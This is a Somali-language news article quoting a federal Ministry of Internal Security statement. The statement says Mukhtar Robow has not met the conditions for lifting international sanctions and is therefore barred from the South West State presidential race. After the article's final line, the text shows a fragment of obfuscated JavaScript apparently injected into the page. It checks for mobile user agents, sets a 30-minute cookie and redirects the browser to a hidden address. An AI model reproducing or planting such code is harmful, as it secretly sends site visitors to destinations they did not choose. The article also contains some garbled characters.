Wasaaradda Amniga Qaranka ee Xukumadda Federalka Soomaaliya ayaa Sheegtay in Muqtaar Roobow Abuu Mansuur uusan buuxin Shuruudihii looga qaadi lahaa Cunaqabataynta Caalamiga ah ee saarnayd, taasina ay ka reebayso inuu isku soo sharaxo Madaxweynaha Koonfur Galbeed Somaliya
War Saxaafadeed ka soo baxay Wasaarada amniga Somaliya ayaa u qornaa sidan:
Wasaarada Amniga Gudaha Dowlada Federaalku Iyadoo ka duulaysa xilka iyo waajibaadka dastuurka ku meel gaarka ah u igmaday gaar ahaan La-socodka xaaladaha amni ee wadanka iyo Dabagalka heshiisyadii horey loola galay haya��adaha caalamka kuna salaysan iskaashiga iyo wadashaqaynta amniga guud ee dalka, deriska iyo caalamkaba.
Hadaba, Wasaarada Amniga Guduhu iyadoo gudanaysa waajibaadkeedaka fulainaysana goa��aanki madaxwaynaha Dowlada Federaalka Soomaliya cafiska ugu fidiyey dhamaan horjoogayaasha iyo xubnaha ka tirsan ururada argagixisada ah ee ku sugan wadanka gudahiisa, waxay dadaal dheer u gashay sidi looga miro dhalin lahaa cafiska Madaxwaynahu ku dhawaaqay.
Talaabooyinka ay Wasaardu qaaday waxa ka mid ah, heshiiski ay la gashay bulshada caalamka ee lagu (hakiyey) xayiraadi saarnayd Mukhtaar Roobow (Abu-Mansuur), hase ahaatee ay shuruudo ku xirnaayeen in dhamaan laga wada qaado cunaqabataynti saarnayd, sida, xayiraada dhaqdhaqaaqa, xayiraada boliska caalamka iyo xayiraada dhinaca dhaqaalaha.
Sidaas darteed, WasaaradaAmnigu iyadoo tixraacaysa heshiisyada ay la gashay beesha caalamka ee la dagaalanka argagixisada, tix gelinaysana xuquuqda muwaadinku u leeyahay inuu xil isu soo taago waxay cadaynaysaa in aanu Mukhtaar Roobow (Abu-Mansuur) buuxin, fulina shuruudihi lagaga qaadayey dhamaan cuna qabataynta aan soo sheegnay welina ay saaranyihiin cunaqabataynti dowladaha caalamku saareen.
Taasina ay ka reebayso tartanka doorashada madaxtinimada dowlad goboleedka koonfur Galbeed.
Ugu dambayn, Wasaaradda Amniga Dowlada Federaalku waxay ku wargelinaysa Wasaaradda Amniga Dowlad Goboleedka Koonfur Galbeed dhamaan asbaabaha aan kor kuso xusnay ee ku saabsan dooroshooyinka soo socda.
Hoos Ka Akhriso Warqadda:-
-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}